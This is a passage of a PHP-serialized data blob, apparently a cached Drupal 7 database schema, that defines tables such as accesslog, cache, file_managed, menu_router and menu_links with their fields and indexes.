keys\";a:2:{s:8:\"set_user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}s:8:\"set_name\";a:2:{s:5:\"table\";s:12:\"shortcut_set\";s:7:\"columns\";a:1:{s:8:\"set_name\";s:8:\"set_name\";}}}s:6:\"module\";s:8:\"shortcut\";s:4:\"name\";s:18:\"shortcut_set_users\";}s:9:\"accesslog\";a:6:{s:6:\"fields\";a:9:{s:3:\"aid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"sid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:4:\"path\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:3:\"url\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;}s:8:\"hostname\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:0;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";i:0;}s:5:\"timer\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:19:\"accesslog_timestamp\";a:1:{i:0;s:9:\"timestamp\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:12:\"foreign keys\";a:1:{s:7:\"visitor\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:10:\"statistics\";s:4:\"name\";s:9:\"accesslog\";}s:12:\"node_counter\";a:4:{s:6:\"fields\";a:4:{s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"totalcount\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:3:\"big\";}s:8:\"daycount\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:6:\"medium\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:10:\"statistics\";s:4:\"name\";s:12:\"node_counter\";}s:8:\"variable\";a:4:{s:6:\"fields\";a:2:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"value\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"name\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"variable\";}s:7:\"actions\";a:4:{s:6:\"fields\";a:5:{s:3:\"aid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"parameters\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:5:\"label\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:7:\"actions\";}s:5:\"batch\";a:5:{s:6:\"fields\";a:4:{s:3:\"bid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:5:\"token\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:9:\"timestamp\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;}s:5:\"batch\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:7:\"indexes\";a:1:{s:5:\"token\";a:1:{i:0;s:5:\"token\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"batch\";}s:11:\"blocked_ips\";a:5:{s:6:\"fields\";a:2:{s:3:\"iid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:2:\"ip\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:40;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:1:{s:10:\"blocked_ip\";a:1:{i:0;s:2:\"ip\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"iid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"blocked_ips\";}s:5:\"cache\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"cache\";}s:15:\"cache_bootstrap\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:15:\"cache_bootstrap\";}s:10:\"cache_form\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_form\";}s:10:\"cache_page\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_page\";}s:10:\"cache_menu\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_menu\";}s:10:\"cache_path\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"cache_path\";}s:16:\"date_format_type\";a:5:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:7:\"indexes\";a:1:{s:5:\"title\";a:1:{i:0;s:5:\"title\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:16:\"date_format_type\";}s:12:\"date_formats\";a:5:{s:6:\"fields\";a:4:{s:4:\"dfid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;s:8:\"unsigned\";b:1;}s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"dfid\";}s:11:\"unique keys\";a:1:{s:7:\"formats\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"type\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"date_formats\";}s:18:\"date_format_locale\";a:4:{s:6:\"fields\";a:3:{s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:8:\"language\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:2:{i:0;s:4:\"type\";i:1;s:8:\"language\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:18:\"date_format_locale\";}s:12:\"file_managed\";a:7:{s:6:\"fields\";a:8:{s:3:\"fid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uri\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:6:\"binary\";b:1;}s:8:\"filemime\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filesize\";a:5:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:3:\"big\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:3:{s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:6:\"status\";a:1:{i:0;s:6:\"status\";}s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}}s:11:\"unique keys\";a:1:{s:3:\"uri\";a:1:{i:0;s:3:\"uri\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:12:\"foreign keys\";a:1:{s:10:\"file_owner\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"file_managed\";}s:10:\"file_usage\";a:5:{s:6:\"fields\";a:5:{s:3:\"fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:2:\"id\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"count\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:4:{i:0;s:3:\"fid\";i:1;s:4:\"type\";i:2;s:2:\"id\";i:3;s:6:\"module\";}s:7:\"indexes\";a:3:{s:7:\"type_id\";a:2:{i:0;s:4:\"type\";i:1;s:2:\"id\";}s:9:\"fid_count\";a:2:{i:0;s:3:\"fid\";i:1;s:5:\"count\";}s:10:\"fid_module\";a:2:{i:0;s:3:\"fid\";i:1;s:6:\"module\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"file_usage\";}s:5:\"flood\";a:5:{s:6:\"fields\";a:5:{s:3:\"fid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:5:\"event\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"identifier\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"expiration\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:7:\"indexes\";a:2:{s:5:\"allow\";a:3:{i:0;s:5:\"event\";i:1;s:10:\"identifier\";i:2;s:9:\"timestamp\";}s:5:\"purge\";a:1:{i:0;s:10:\"expiration\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"flood\";}s:11:\"menu_router\";a:5:{s:6:\"fields\";a:23:{s:4:\"path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"load_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:16:\"to_arg_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:15:\"access_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"access_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:13:\"page_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"page_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:17:\"delivery_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"fit\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"number_parts\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:7:\"context\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"tab_parent\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"tab_root\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"title_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"title_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"theme_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"theme_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:11:\"description\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:8:\"position\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"include_file\";a:2:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:6:\"medium\";}}s:7:\"indexes\";a:3:{s:3:\"fit\";a:1:{i:0;s:3:\"fit\";}s:10:\"tab_parent\";a:3:{i:0;a:2:{i:0;s:10:\"tab_parent\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}s:21:\"tab_root_weight_title\";a:3:{i:0;a:2:{i:0;s:8:\"tab_root\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"path\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"menu_router\";}s:10:\"menu_links\";a:5:{s:6:\"fields\";a:25:{s:9:\"menu_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mlid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"plid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"link_path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"router_path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:10:\"link_title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:7:\"options\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:12:\"translatable\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:6:\"system\";}s:6:\"hidden\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:8:\"external\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:12:\"has_children\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:8:\"expanded\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"depth\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:10:\"customized\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:2:\"p1\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p2\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p3\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p4\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p5\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p6\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p7\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p8\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:2:\"p9\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"updated\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}}s:7:\"indexes\";a:4:{s:9:\"path_menu\";a:2:{i:0;a:2:{i:0;s:9:\"link_path\";i:1;i:128;}i:1;s:9:\"menu_name\";}s:22:\"menu_plid_expand_child\";a:4:{i:0;s:9:\"menu_name\";i:1;s:4:\"plid\";i:2;s:8:\"expanded\";i:3;s:12:\"has_children\";}s:12:\"menu_parents\";a:10:{i:0;s:9:\"menu_name\";i:1;s:2:\"p1\";i:2;s:2:\"p2\";i:3;s:2:\"p3\";i:4;s:2:\"p4\";i:5;s:2:\"p5\";i:6;s:2:\"p6\";i:7;s:2:\"p7\";i:8;s:2:\"p8\";i:9;s:2:\"p9\";}s:11:\"router_path\";a:1:{i:0;a:2:{i:0;s:11:\"router_path\";i:1;i:128;}}}s:11:\"primary key\";a:1:{i:0;s:4:\"mlid\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:10:\"menu_links\";}s:5:\"queue\";a:5:{s:6:\"fields\";a:5:{s:7:\"item_id\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:7:\"item_id\";}s:7:\"indexes\";a:2:{s:12:\"name_created\";a:2:{i:0;s:4:\"name\";i:1;s:7:\"created\";}s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:5:\"queue\";}s:8:\"registry\";a:5:{s:6:\"fields\";a:5:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:9;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filename\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:4:\"name\";i:1;s:4:\"type\";}s:7:\"indexes\";a:1:{s:4:\"hook\";a:3:{i:0;s:4:\"type\";i:1;s:6:\"weight\";i:2;s:6:\"module\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"registry\";}s:13:\"registry_file\";a:4:{s:6:\"fields\";a:2:{s:8:\"filename\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"hash\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}}s:11:\"primary 